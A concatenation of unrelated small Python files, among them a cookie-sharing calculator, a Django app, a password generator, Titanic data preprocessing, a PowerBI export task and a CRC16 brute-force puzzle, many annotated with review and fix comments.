        print("\n".join([" ".join(map(str, ans)) for ans in ANS]))
    else:
        print("impossible")

if __name__ == '__main__':
    main()
|
def paty_planner(people, cook):
    """Report how many cookies each guest gets and how many are left over.

    :param people: number of guests (must be > 0)
    :param cook: total number of cookies
    """
    cooks = cook // people
    # fix: the leftovers are cookies modulo guests; the original computed
    # `people % cook`, which is wrong (e.g. 5 cookies for 2 people reported
    # 2 left over instead of 1).
    left = cook % people
    print("Good! Your Paty will have {} people witch a total of {} cookies each people will eat {}and will left {}".format(people,cook,cooks,left))
# Interactive driver: keep asking until valid counts are given, plan once,
# then say goodbye.
paty_start = 'y'
while paty_start == 'y':
    while True:
        try:
            people = int(input("Enter how many peoples will go to the paty"))
            cooks = int(input("Enter wich the number of cooks"))
            # The division validates that `people` is non-zero before planning.
            # NOTE(review): non-numeric input raises ValueError, which is not
            # caught here.
            q = cooks // people
            break
        except ZeroDivisionError:
            print("no have people Please give a number gretter then 0")
    paty_planner(people,cooks)
    # Single planning round: end the outer loop and fall through to 'bye'.
    paty_start="n"
else:
    # while/else: runs when the loop condition becomes false (no break).
    print("bye")
|
from . import *
class IsRestartRequiredCommand(ShellCommand):
    """Shell check that reports whether a reboot is pending (Ubuntu-only),
    based on /var/run/reboot-required.pkgs."""

    name = "needs_restart"
    command = "sh -c 'if test -f /var/run/reboot-required.pkgs ; then cat /var/run/reboot-required.pkgs; fi'"
    desc = "checks whether a reboot is required (Ubuntu-only)"
    supported = "linux"

    @staticmethod
    def parse(output=None):
        """Pass the raw command output through; None/empty becomes ''."""
        return output if output else ""

    @staticmethod
    def compare(prev, cur):
        """Emit a warning + detail when the current run lists pending packages."""
        if not cur:
            return []
        pkgs = sorted(cur.splitlines())
        return [W("reboot required"), D("reboot required because of packages [%s]" % (",".join(pkgs)))]
|
"""empty message
Revision ID: e400dee696f2
Revises: 5d6b56b7dc32
Create Date: 2018-10-30 21:04:00.455078
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e400dee696f2'
down_revision = '5d6b56b7dc32'
branch_labels = None
depends_on = None
def upgrade():
    """Add the FK from espn_projections.player_id to field_player.espn_id."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_foreign_key(None, 'espn_projections', 'field_player', ['player_id'], ['espn_id'])
    # ### end Alembic commands ###
def downgrade():
    """Drop the (auto-named) foreign key added by upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_constraint(None, 'espn_projections', type_='foreignkey')
    # ### end Alembic commands ###
|
from typing import List
import numpy as np
def cal_q_error(predict, label, log=True):
    """Return the q-error max(predict/label, label/predict).

    When *log* is True, both inputs are natural-log values and are
    exponentiated before the ratio is taken.
    """
    if log:
        predict = np.e ** predict
        label = np.e ** label
    return predict / label if predict > label else label / predict
def print_qerror(q_error: List):
    """Print summary statistics (max/mean/median and high percentiles) of a
    list of q-errors."""
    stats = [
        ("max qerror: {:.4f}", max(q_error)),
        ("mean qerror: {:.4f}", np.mean(q_error)),
        ("media qerror: {:.4f}", np.median(q_error)),
        ("90th qerror: {:.4f}", np.percentile(q_error, 90)),
        ("95th qerror: {:.4f}", np.percentile(q_error, 95)),
        ("99th qerror: {:.4f}", np.percentile(q_error, 99)),
    ]
    for template, figure in stats:
        print(template.format(figure))
|
from typing import Any, Dict, List
from .base_api import BaseAPI
class TransactionService(BaseAPI):
    """Client for the Gnosis Safe transaction service."""

    # Service base URL per chain id; unlisted networks are unsupported.
    URL_BY_NETWORK = {
        1: 'https://safe-transaction.mainnet.gnosis.io',
        # 3:
        4: 'https://safe-transaction.rinkeby.gnosis.io',
        # 5:
        # 42
    }

    def get_balances(self, safe_address: str) -> List[Dict[str, Any]]:
        """Return the token balances for *safe_address*.

        Raises RuntimeError when the service replies with a non-OK status.
        """
        path = f'/api/v1/safes/{safe_address}/balances/'
        response = self._get_request(path)
        if not response.ok:
            # fix: the original raised the *class* BaseAPI (not an exception
            # instance) and referenced an undefined name `url`.
            raise RuntimeError(f'Cannot get balances from {path}')
        return response.json()

    def get_transactions(self, safe_address: str) -> List[Dict[str, Any]]:
        """Return the transaction list for *safe_address* ([] when absent).

        Raises RuntimeError when the service replies with a non-OK status.
        """
        path = f'/api/v1/safes/{safe_address}/transactions/'
        response = self._get_request(path)
        if not response.ok:
            # fix: same undefined-`url` bug, plus the copy-pasted message
            # said "balances" in the transactions method.
            raise RuntimeError(f'Cannot get transactions from {path}')
        return response.json().get('results', [])
|
# fix: Python 2 print statements converted to the Python 3 print() function,
# matching the rest of the code base.
print("hello,world")
print("Muxistdio yuyilei")
|
from itertools import product
class Solution:
    def letterCasePermutation(self, S: str) -> List[str]:
        """Return every string obtainable from S by toggling letter case.

        Each alphabetic position contributes (lower, upper); every other
        character contributes itself. The cartesian product enumerates all
        combinations in order.
        """
        # fix: use a real one-tuple `(x,)` for the non-letter branch — the
        # original bare `(x)` is just the string x and only worked because
        # product() happens to iterate a 1-character string the same way.
        f = lambda x: (x.lower(), x.upper()) if x.isalpha() else (x,)
        return list(map(''.join, product(*map(f, S))))
from bp.Model import Model
import numpy as np
# 卷积神经网络 架构 还不错。。
# Smoke-test of the custom bp CNN framework: learn to separate all-ones
# images (even indices, label 1) from all-zeros images (odd indices, label 0).
x = np.ones([8,2,2,1])
x[(1,3,5,7),:,:,:] = np.zeros([4,2,2,1])
y = np.array([[1, 0, 1, 0, 1, 0, 1, 0]])
model = Model(x, y,inputType='image')
model.addConv(shape=(2,2,1,1),ifOutput=False)  # single 2x2 conv filter
model.addReshape(shape=[8,1])                  # flatten conv output per sample
model.addLayer(10,'sigmoid',False)
model.addLayer(1,'sigmoid',True)               # binary output layer
for epoch in range(1000):
    # NOTE(review): the argument to train() is presumably a step/batch count —
    # confirm in bp.Model.
    model.train(10)
|
# try:
# for i in ['a','b','c']:
# i = int(i)
# print (i**2)
# except TypeError:
# print("Une erreur s'est produite ! ")
# def demande():
# while True:
# try:
# n = int(input("Entrer un entier: "))
# except:
# print("Merci d'entre un entier a nouveau")
# continue
# else:
# break
# print("le nombre au carré est : ",n**2)
# demande()
# fix: PEP 8 (E731) discourages assigning a lambda to a name — a def gives
# the function a proper name for tracebacks and allows a docstring.
def ttc(prixHT):
    """Return the price including 20% VAT for a pre-tax price *prixHT*."""
    return prixHT + (prixHT * 20/100)

print(ttc(24))
|
import time
# Read in data
def get_data(filename, features_in_use):
    """Parse a CSV file into [{'label': int, 'features': [float, ...]}, ...].

    The header line is stashed in the module-global `top_file_line`. Only the
    first *features_in_use* columns become features; the last column is the
    integer label.
    """
    global top_file_line
    data = []
    # fix: `with` guarantees the handle is closed even if a row fails to
    # parse (the original leaked it on exceptions); also stops shadowing
    # the builtin name `file`.
    with open(filename) as fh:
        top_file_line = fh.readline()
        for line in fh:
            data_points = line.split(",")
            # Get the features as a float vector.
            features = [float(x) for x in data_points[0:features_in_use]]
            # The trailing column is the label.
            label = int(data_points[-1])
            data.append({"label": label, "features": features})
    return data
# Run through the test set of data, get projections
def predict(classifier, data):
    """Overwrite each item's 'label' with the classifier's prediction for
    that item's feature vector (in place)."""
    print("Starting predictions.")
    for item in data:
        item['label'] = classifier.predict(item['features'])
    print("Done predicting.")
# Write results to output location
def write_results(data, output_location):
    """Write the labelled rows as CSV: six feature columns then the label."""
    # fix: `with` closes the file even if a write raises (the original
    # leaked the handle on errors mid-write).
    with open(output_location, "w") as output_file:
        output_file.write("Feature_1,Feature_2,Feature_3,Feature_4,Feature_5,Feature_6,Label\n")
        for item in data:
            output_file.write(','.join(map(str, item['features'])) + "," + str(item['label']) + "\n")
# Run the code.
def main(Model, best_item_loc=False, training_set_loc=False, testing_set_loc=False, results_loc=False,
         iv_count=False, validation_count=3):
    """End-to-end run: load data, optionally cross-validate, train, predict, save.

    NOTE(review): the `False` defaults act as "not provided" sentinels; `None`
    would be the conventional choice.
    """
    start_time = time.time()
    # Grab data
    training_data = get_data(training_set_loc, iv_count)
    testing_data = get_data(testing_set_loc, iv_count)
    # Initialize and train the classifier
    classifier = Model(best_item_loc=best_item_loc)
    # Validate
    if validation_count > 0:
        print("Validated accuracy is {:.2%}.".format(classifier.n_fold_validate(training_data, validation_count)))
    # Train
    classifier.train_with_data(training_data)
    # Predict end value
    predict(classifier, testing_data)
    # Print end values to document
    write_results(testing_data, results_loc)
    print("--- %s seconds ---" % (time.time() - start_time))
|
from django.conf.urls.defaults import patterns, url
# URL routes for the dashboard app.
# NOTE(review): `patterns(...)` with dotted-string view paths is the
# pre-Django-1.8 style (django.conf.urls.defaults was removed in 1.6);
# modern Django requires a plain list of url()/path() entries instead.
urlpatterns = patterns('',
    url(r'^$', 'app.views.home', name='home'),
    url(r'^paypal/data.json$', 'app.views.data', name='data'),
    url(r'^paypal$', 'app.views.paypal', name='paypal'),
    url(r'^graphite$', 'app.views.graphite', name='graphite'),
    url(r'^ganglia$', 'app.views.ganglia', name='ganglia'),
    url(r'^webapps/sample-manifest.webapp$', 'app.views.webapp_manifest', name='webapp-manifest'),
    url(r'^webapps/sample-image.png$', 'app.views.webapp_image', name='webapp-image'),
)
|
"""
This is a password generator script that works as follows:
It allows the user to enter a word or phrase and the length they would like for the password.
If it is over 20 characters then it will ask if they are sure as long passwords aren't memorable unless stored.
If they do not provide a word or phrase it will choose a random word using an API call.
If no length is provided it will choose a random length between 8 and 20.
The most random passwords will be generated by leaving both blank otherwise the only variability comes from the numbers
added to the words.
"""
import random
import json
from random_word import RandomWords
import yaml
import requests
def substitue(word):
    """Replace selected lowercase letters with look-alike symbols.

    :param word: the word whose letters are substituted
    :return: the word with o->0, a->@, i->!, e->3 applied
    """
    replacements = {"o": "0", "a": "@", "i": "!", "e": "3"}
    for plain, fancy in replacements.items():
        word = word.replace(plain, fancy)
    return word
def randPass(length):
    """Generate a password from scratch: fetch a random word from the
    random_word API, then pad/transform it with addNumbers().

    :param length: the length of the password
    :return: the password of the given length
    """
    word_source = RandomWords()
    base_word = word_source.get_random_word()
    return addNumbers(base_word, length)
def addNumbers(word, length):
    """
    Add numbers to the end of each word of a single word or phrase. The number
    of digits depends on the requested password length: a single word gets the
    missing characters appended; each word of a phrase gets its share
    (length / word count). Letter substitution is applied via substitue().

    :param word: the word or phrase
    :param length: length of the password
    :return: the words with the numbers appended.
    """
    words = word.split(" ")
    password = ""
    if len(words) == 1:
        if len(word) < length:
            # Slice of a random up-to-16-digit number supplies the padding.
            # NOTE(review): if the drawn number has fewer digits than needed,
            # the result comes up short of `length` -- confirm acceptable.
            word = substitue(word) + str(random.randrange(0, 10000000000000000))[:length - len(word)]
        password = word
    else:
        if len(word) < length:
            for x in words:
                # Each word gets its integer share of the padding digits.
                x = substitue(x) + str(random.randrange(0, 10000000000000000))[:int((length / len(words) - len(x)))]
                password += x + " "
        else:
            # Phrase already long enough: substitution only, no padding.
            # NOTE(review): both multi-word branches leave a trailing space.
            for x in words:
                password += substitue(x) + " "
    return password
def generatePassword(word, length):
    """
    This is the base function that checks the length and whether the
    word/phrase was left blank to decide what happens next.

    :param word: word/phrase, or "" to pick a random word
    :param length: requested length, or 0 to pick a random one
    :return: the password
    """
    # (Removed an unused `word.split(" ")` and a dead `password = ""`
    # pre-assignment from the original.)
    # A length of 0 means "not provided": choose one in [8, 20).
    if length == 0:
        length = random.randrange(8, 20)
    # Empty input means "no word given": build from a random word instead.
    if word == "":
        return randPass(length)
    return addNumbers(word, length)
print("The program will generate a random password based of the following criteria:\nIf you leave the word/phrase empty"
      " it will generate a random password of the specified length. If you leave the length empty it will generate a "
      "length between 8-20.\nIf it is a phrase it must be separated by spaces.\n"
      " If the phrase is longer than the length then it will not be shortened.\n\nBy default it will "
      "use special characters and randomly make some characters uppercase. To leave selection blank just press enter\n")
words = input("Enter a word or phrase (leave blank for random): ")
# Validate that the length is a number; lengths over 20 need confirmation.
# Bug fixes vs. the original loop: a valid length <= 20 used to hit
# `continue` and re-prompt forever, and answering "n" to the confirmation
# still broke out of the loop instead of asking again.
while True:
    pLength = input("Length of password: ")
    if pLength == "":
        pLength = 0  # 0 means "pick a random length" downstream
        break
    try:
        pLength = int(pLength)
    except ValueError:  # narrower than the original bare except
        print("Please enter a number")
        continue
    if pLength <= 20:
        break
    # Long passwords aren't memorable unless stored -- confirm first.
    answer = input("Are you sure? (y/n)")
    if answer.lower() == "y":
        break
    # Any other answer re-prompts for a new length.
print("Password: ", generatePassword(words, pLength))
|
# -*- coding: UTF-8 -*-
import numpy as np
import pandas as pd
# Load the Kaggle Titanic CSVs; gender_submission provides reference labels
# for the test set.
train_data = pd.read_csv("train.csv", header=0, delimiter=',')
test_data = pd.read_csv("test.csv", header=0, delimiter=',')
result = pd.read_csv("gender_submission.csv", header=0, delimiter=',')
# Keep only the label column from the reference submission.
result = result['Survived']
class Datasets:
    """Mini-batch wrapper around a preprocessed Titanic dataframe.

    When ``is_training`` is True, the 'Survived' column is split off into
    ``self.labels`` and dropped from the feature frame.
    """

    def __init__(self, data, is_training):
        self.df = self.preprocess(data)
        if is_training:
            #self.df = self.oversampling(self.df)
            self.labels = self.df['Survived']
            # 'Survived' is the first column after preprocessing; drop it.
            self.df = self.df.iloc[:, 1:]
        self.num_examples = len(self.df)
        self.pos = 0  # cursor for next_batch

    def oversampling(self, data):
        """Balance classes by resampling the minority class with replacement."""
        pos = data[data['Survived'] == 1]
        neg = data[data['Survived'] == 0]
        n_pos = len(pos)
        n_neg = len(neg)
        if n_pos > n_neg:
            neg = pd.concat([neg, neg.sample(n=n_pos - n_neg, replace=True)])
        else:
            pos = pd.concat([pos, pos.sample(n=n_neg - n_pos, replace=True)])
        return pd.concat([neg, pos])

    def preprocess(self, data):
        """Drop identifier columns, encode categoricals, impute missing
        values with column medians and binarize Age (child < 15 vs adult)."""
        data = data.drop(labels=['Cabin', 'PassengerId', 'Ticket', 'Name'], axis=1)
        # Map Sex to numeric. The original used chained indexing
        # (data['Sex'][mask] = ...) which triggers SettingWithCopyWarning and
        # can silently write to a copy in newer pandas.
        data['Sex'] = data['Sex'].map({'male': 0, 'female': 1})
        # One-hot encode the categorical columns.
        data = pd.concat([data, pd.get_dummies(data['Embarked'], prefix='Embarked')], axis=1)
        data = pd.concat([data, pd.get_dummies(data['Pclass'], prefix='Pclass')], axis=1)
        data = data.drop(labels=['Embarked', 'Pclass'], axis=1)
        # Impute remaining missing values with each column's median.
        for col in data.columns:
            data[col] = data[col].fillna(data[col].median())
        # Binarize age: under-15 -> 0, 15-and-over -> 1 (order matters: the
        # zeros written by the first line stay 0 after the second).
        data.loc[data['Age'] < 15.0, 'Age'] = 0
        data.loc[data['Age'] >= 15.0, 'Age'] = 1
        return data

    def next_batch(self, batch_size):
        """Return the next (features, labels) slice; the cursor wraps to the
        start once the data is exhausted."""
        features = self.df.iloc[self.pos:self.pos + batch_size, :]
        labels = self.labels[self.pos:self.pos + batch_size]
        self.pos += batch_size
        if self.pos >= self.num_examples:
            self.pos = 0
        return features, labels
def train_test_feature_equal(train, test):
    """Drop from *train* any feature column absent from *test*; the
    'Survived' label column is always kept."""
    extra_cols = [col for col in train.columns
                  if col not in test.columns and col != 'Survived']
    for col in extra_cols:
        train = train.drop(col, axis=1)
    return train, test
# Equalize feature sets, then hold out the first 20% of training rows as a
# validation split.
train_data, test_data = train_test_feature_equal(train_data, test_data)
train_div = int(len(train_data)*0.2)
train = Datasets(train_data.iloc[train_div:, :], True)
validation = Datasets(train_data.iloc[:train_div, :], True)
test = Datasets(test_data, False)
|
import logging
import os
import shutil
from pathlib import Path
import tempfile
import pandas as pd
from autumn.core import db, plots
from autumn.settings import REMOTE_BASE_DIR
from autumn.infrastructure.tasks.utils import get_project_from_run_id
from autumn.core.utils.s3 import download_from_run_s3, list_s3, upload_to_run_s3, get_s3_client
from autumn.core.utils.timer import Timer
from .storage import StorageMode, MockStorage, S3Storage, LocalStorage
from autumn.core.runs import ManagedRun
logger = logging.getLogger(__name__)
def powerbi_task(run_id: str, urunid: str, quiet: bool, store="s3"):
    """Post-process a finished model run into a PowerBI-ready database.

    Prunes the per-chain full-run databases down to the selected candidate
    run(s), collates them, adds uncertainty quantiles, applies
    PowerBI-specific post-processing, then stores the final database and
    uncertainty plots via the selected storage backend.

    :param run_id: identifier of the managed run to process
    :param urunid: "mle" to auto-select the MLE run, or "<chain>_<run>"
    :param quiet: suppress per-file storage logging when True
    :param store: one of StorageMode.MOCK / S3 / LOCAL (default "s3")
    """
    # NOTE(review): this rebinds (shadows) the imported module-level
    # REMOTE_BASE_DIR with a fresh temp dir for the lifetime of this task.
    REMOTE_BASE_DIR = Path(tempfile.mkdtemp())
    POWERBI_PLOT_DIR = os.path.join(REMOTE_BASE_DIR, "plots", "uncertainty")
    POWERBI_DATA_DIR = os.path.join(REMOTE_BASE_DIR, "data", "powerbi")
    POWERBI_DIRS = [POWERBI_DATA_DIR, POWERBI_PLOT_DIR]
    POWERBI_PRUNED_DIR = os.path.join(POWERBI_DATA_DIR, "pruned")
    POWERBI_COLLATED_PATH = os.path.join(POWERBI_DATA_DIR, "collated")
    POWERBI_COLLATED_PRUNED_PATH = os.path.join(POWERBI_DATA_DIR, "collated-pruned")
    s3_client = get_s3_client()
    project = get_project_from_run_id(run_id)
    # Set up directories for plots and output data.
    with Timer(f"Creating PowerBI directories"):
        for dirpath in POWERBI_DIRS:
            if os.path.exists(dirpath):
                shutil.rmtree(dirpath)
            os.makedirs(dirpath)
    mr = ManagedRun(run_id, s3_client=s3_client)
    # Choose the storage backend for the final artifacts.
    # NOTE(review): an unrecognized `store` value leaves `storage` unbound
    # and fails later with NameError -- confirm callers only pass
    # StorageMode values, or add an explicit error branch.
    if store == StorageMode.MOCK:
        storage = MockStorage()
    elif store == StorageMode.S3:
        s3_client = get_s3_client()
        storage = S3Storage(s3_client, run_id, REMOTE_BASE_DIR, not quiet)
    elif store == StorageMode.LOCAL:
        storage = LocalStorage(run_id, REMOTE_BASE_DIR)
    # Find the full model run databases in AWS S3.
    # key_prefix = os.path.join(run_id, os.path.relpath(FULL_RUN_DATA_DIR, REMOTE_BASE_DIR))
    # chain_db_keys = []
    # for filename_base in ["mcmc_run", "mcmc_params", "derived_outputs"]:
    #     chain_db_keys += list_s3(s3_client, key_prefix, key_suffix=f"{filename_base}.feather")
    # Download the full model run databases.
    # with Timer(f"Downloading full model run data"):
    #     for src_key in chain_db_keys:
    #         download_from_run_s3(s3_client, run_id, src_key, quiet)
    # No urunid supplied; get a single candidate dataframe (ie the MLE run)
    if urunid == "mle":
        all_mcmc_df = mr.full_run.get_mcmc_runs()
        candidates_df = db.process.select_pruning_candidates(all_mcmc_df, 1)
    else:
        # urunid encodes an explicit "<chain>_<run>" selection.
        c, r = (int(x) for x in urunid.split("_"))
        candidates_df = pd.DataFrame(columns=["chain", "run"])
        candidates_df.loc[0] = dict(chain=c, run=r)
    # Remove unnecessary data from each full model run database.
    full_db_paths = db.load.find_db_paths(mr.full_run.local_path)
    with Timer(f"Pruning chain databases"):
        get_dest_path = lambda p: os.path.join(POWERBI_PRUNED_DIR, os.path.basename(p))
        for full_db_path in full_db_paths:
            # Chain id is the trailing "-<n>" suffix of the db filename.
            chain_id = int(full_db_path.split("-")[-1])
            chain_candidates = candidates_df[candidates_df["chain"] == chain_id]
            db.process.prune_chain(full_db_path, get_dest_path(full_db_path), chain_candidates)
    # Collate data from each pruned full model run database into a single database.
    pruned_db_paths = db.load.find_db_paths(POWERBI_PRUNED_DIR)
    with Timer(f"Collating pruned databases"):
        db.process.collate_databases(pruned_db_paths, POWERBI_COLLATED_PATH)
    # Calculate uncertainty for model outputs.
    with Timer(f"Calculating uncertainty quartiles"):
        db.uncertainty.add_uncertainty_quantiles(POWERBI_COLLATED_PATH, project.plots)
    # Remove unnecessary data from the database.
    with Timer(f"Pruning final database"):
        db.process.prune_final(POWERBI_COLLATED_PATH, POWERBI_COLLATED_PRUNED_PATH, candidates_df)
    # Unpivot database tables so that they're easier to process in PowerBI.
    run_slug = run_id.replace("/", "-")
    dest_db_path = os.path.join(POWERBI_DATA_DIR, f"powerbi-{run_slug}.db")
    with Timer(f"Applying PowerBI specific post-processing final database"):
        db.process.powerbi_postprocess(POWERBI_COLLATED_PRUNED_PATH, dest_db_path, run_id)
    # Upload final database to AWS S3
    with Timer(f"Uploading PowerBI data to AWS S3"):
        # upload_to_run_s3(s3_client, run_id, dest_db_path, quiet)
        storage.store(dest_db_path)
    # Create uncertainty plots
    with Timer(f"Creating uncertainty plots"):
        plots.uncertainty.plot_uncertainty(project.plots, dest_db_path, POWERBI_PLOT_DIR)
    # Upload the plots to AWS S3.
    with Timer(f"Uploading plots to AWS S3"):
        # upload_to_run_s3(s3_client, run_id, POWERBI_PLOT_DIR, quiet)
        storage.store(POWERBI_PLOT_DIR)
    # Clean up the temporary working directory.
    shutil.rmtree(REMOTE_BASE_DIR)
|
from django.db import models
class Pizza(models.Model):
    # Pizza name; __str__ truncates the display to 20 characters.
    # NOTE(review): max_length on a TextField is not enforced at the DB level.
    name = models.TextField(max_length=50)

    def __str__(self):
        """Return the name, truncated with an ellipsis when over 20 chars."""
        if len(self.name) > 20:
            # Bug fix: the original wrote `+ ...` which concatenates the
            # Ellipsis object and raises TypeError at render time.
            return self.name[:20] + "..."
        else:
            return self.name
class Topping(models.Model):
    # Topping name; __str__ truncates the display to 20 characters.
    name = models.TextField(max_length=50)
    # Each topping belongs to exactly one pizza; deleted with its pizza.
    pizza = models.ForeignKey(Pizza, on_delete=models.CASCADE)

    def __str__(self):
        """Return the name, truncated with an ellipsis when over 20 chars."""
        if len(self.name) > 20:
            # Bug fix: the original wrote `+ ...` which concatenates the
            # Ellipsis object and raises TypeError at render time.
            return self.name[:20] + "..."
        else:
            return self.name
|
from selenium import webdriver

# Launch a Chrome session (requires chromedriver on PATH) and read the alt
# text of the header image on inventwithpython.com.
browser = webdriver.Chrome()
browser.get('http://inventwithpython.com')
# NOTE(review): find_element_by_id was removed in Selenium 4 -- modern code
# uses browser.find_element(By.ID, 'headerimage'); confirm pinned version.
head = browser.find_element_by_id('headerimage')
linkr = head.get_attribute('alt')
print(linkr)
#browser.close()
|
from django.dispatch import receiver
from bifrost.signals import init_service
from bifrost.src.ioc.ServiceContainer import Container
from bifrost_location.Services import Location


@receiver(init_service)
def declare_services(sender, **kwargs):
    """Register the location service in the IoC container when bifrost
    emits its init_service signal."""
    Container.set_service('location_service', Location.Service)
|
import pytest
from django.test import TestCase, override_settings
from .utils import MIDDLEWARES_FOR_TESTING
class TestResponseFunctionWithoutUser(TestCase):
    """Smoke tests for function-based views without the extra middleware:
    every client call must complete without raising."""

    def _request_ok(self, method, *args, **kwargs):
        # Shared guard: any exception from the client call fails the test
        # with the same message format as before.
        try:
            method(*args, **kwargs)
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_request(self):
        self._request_ok(self.client.get, '/restframework/simple/')

    def test_middleware_simple_post_request(self):
        self._request_ok(self.client.post, '/restframework/simple/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_put_request(self):
        self._request_ok(self.client.put, '/restframework/simple/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_delete_request(self):
        self._request_ok(self.client.delete, '/restframework/simple/')

    def test_middleware_simple_get_with_query_string_request(self):
        self._request_ok(self.client.get, '/restframework/simple_with_query_string/', {'data': 'data'})

    def test_middleware_simple_post_with_query_string_request(self):
        self._request_ok(self.client.post, '/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_put_with_query_string_request(self):
        self._request_ok(self.client.put, '/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_delete_with_query_string_request(self):
        self._request_ok(self.client.delete, '/restframework/simple_with_query_string/', {'data': 'data'})
@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestResponseFunctionWithUser(TestCase):
    """Same smoke tests as TestResponseFunctionWithoutUser but with the
    middleware under test installed via override_settings."""

    def _request_ok(self, method, *args, **kwargs):
        # Shared guard: any exception from the client call fails the test
        # with the same message format as before.
        try:
            method(*args, **kwargs)
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_request(self):
        self._request_ok(self.client.get, '/restframework/simple/')

    def test_middleware_simple_post_request(self):
        self._request_ok(self.client.post, '/restframework/simple/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_put_request(self):
        self._request_ok(self.client.put, '/restframework/simple/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_delete_request(self):
        self._request_ok(self.client.delete, '/restframework/simple/')

    def test_middleware_simple_get_with_query_string_request(self):
        self._request_ok(self.client.get, '/restframework/simple_with_query_string/', {'data': 'data'})

    def test_middleware_simple_post_with_query_string_request(self):
        self._request_ok(self.client.post, '/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_put_with_query_string_request(self):
        self._request_ok(self.client.put, '/restframework/simple_with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_delete_with_query_string_request(self):
        self._request_ok(self.client.delete, '/restframework/simple_with_query_string/', {'data': 'data'})
class TestResponseClassWithoutUser(TestCase):
    """Smoke tests for class-based views without the extra middleware:
    every client call must complete without raising."""

    def _request_ok(self, method, *args, **kwargs):
        # Shared guard: any exception from the client call fails the test
        # with the same message format as before.
        try:
            method(*args, **kwargs)
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_request(self):
        self._request_ok(self.client.get, '/restframework/simple/class/')

    def test_middleware_simple_post_request(self):
        self._request_ok(self.client.post, '/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_put_request(self):
        self._request_ok(self.client.put, '/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_delete_request(self):
        self._request_ok(self.client.delete, '/restframework/simple/class/')

    def test_middleware_simple_get_with_query_string_request(self):
        self._request_ok(self.client.get, '/restframework/simple/class/with_query_string/', {'data': 'data'})

    def test_middleware_simple_post_with_query_string_request(self):
        self._request_ok(self.client.post, '/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_put_with_query_string_request(self):
        self._request_ok(self.client.put, '/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_delete_with_query_string_request(self):
        self._request_ok(self.client.delete, '/restframework/simple/class/with_query_string/', {'data': 'data'})
@override_settings(MIDDLEWARE=MIDDLEWARES_FOR_TESTING)
class TestResponseClassWithUser(TestCase):
    """Same smoke tests as TestResponseClassWithoutUser but with the
    middleware under test installed via override_settings."""

    def _request_ok(self, method, *args, **kwargs):
        # Shared guard: any exception from the client call fails the test
        # with the same message format as before.
        try:
            method(*args, **kwargs)
        except Exception as e:
            pytest.fail(f"Error: {e}")

    def test_middleware_simple_get_request(self):
        self._request_ok(self.client.get, '/restframework/simple/class/')

    def test_middleware_simple_post_request(self):
        self._request_ok(self.client.post, '/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_put_request(self):
        self._request_ok(self.client.put, '/restframework/simple/class/', data={'data': 'data'}, content_type='application/json')

    def test_middleware_simple_delete_request(self):
        self._request_ok(self.client.delete, '/restframework/simple/class/')

    def test_middleware_simple_get_with_query_string_request(self):
        self._request_ok(self.client.get, '/restframework/simple/class/with_query_string/', {'data': 'data'})

    def test_middleware_simple_post_with_query_string_request(self):
        self._request_ok(self.client.post, '/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_put_with_query_string_request(self):
        self._request_ok(self.client.put, '/restframework/simple/class/with_query_string/?data=data', data={'data_json': 'data_json'}, content_type='application/json')

    def test_middleware_simple_delete_with_query_string_request(self):
        self._request_ok(self.client.delete, '/restframework/simple/class/with_query_string/', {'data': 'data'})
|
import crc
from itertools import chain, product
# Hex digit alphabet ('0'..'f') used to brute-force the unknown nibbles.
HEX_STRIP = [hex(i)[2:] for i in range(0, 16)]
# CRC value we are trying to reproduce (hex string).
CRC_TARGET = '4930'
# Known message template with a blank to fill in.
FORMATTED_PARTIAL_INPUT = '1b{}beaf'
# The blank is exactly 4 hex digits long.
BLANK_MIN_LEN = 4
BLANK_MAX_LEN = 4
def bruteforce(strip, min_length, max_length):
    """
    Yield every string over the given characters in the required lengths.

    :param strip: list of relevant characters
    :param min_length: the minimum length of string to be returned
    :param max_length: the maximum length of string to be returned
    :return: generator of all options
    """
    # Shorter strings first; within a length, product() preserves the
    # lexicographic order implied by `strip`.
    for size in range(min_length, max_length + 1):
        for combo in product(strip, repeat=size):
            yield ''.join(combo)
# CRC16/A model (poly 0x1021, init 0xC6C6, reflected in/out) from the local
# `crc` helper module.
cac16a = crc.CrcModel(16, "CRC16_A", 0x1021, 0xC6C6, 0x0000, True, True, True)
# Try every candidate fill for the blank until the CRC matches the target.
for option in bruteforce(HEX_STRIP, BLANK_MIN_LEN, BLANK_MAX_LEN):
    input_bytes = FORMATTED_PARTIAL_INPUT.format(option)
    crc_res = cac16a.compute(input_bytes)
    if crc_res == CRC_TARGET:
        # Python 2 print statement -- this script predates Python 3.
        print 'The correct option is: {}, partial input: {}.\r\nfull content: {} equal to the target crc: {}.'.format(
            option, FORMATTED_PARTIAL_INPUT, input_bytes, CRC_TARGET)
|
import pygame
from config import (
PLAYER_IMAGE,
PLAYER_SIZE,
PLAYER_HP,
PLAYER_POSITION,
PLAYER_SPEED,
PLAYER_FIRE_CADENCE,
PLAYER_BULLET_LINES,
PLAYER_BULLET_SPEED,
PLAYER_BULLET_SIZE
)
from Entity import Entity
from Bullet import Bullet
class Player(Entity):
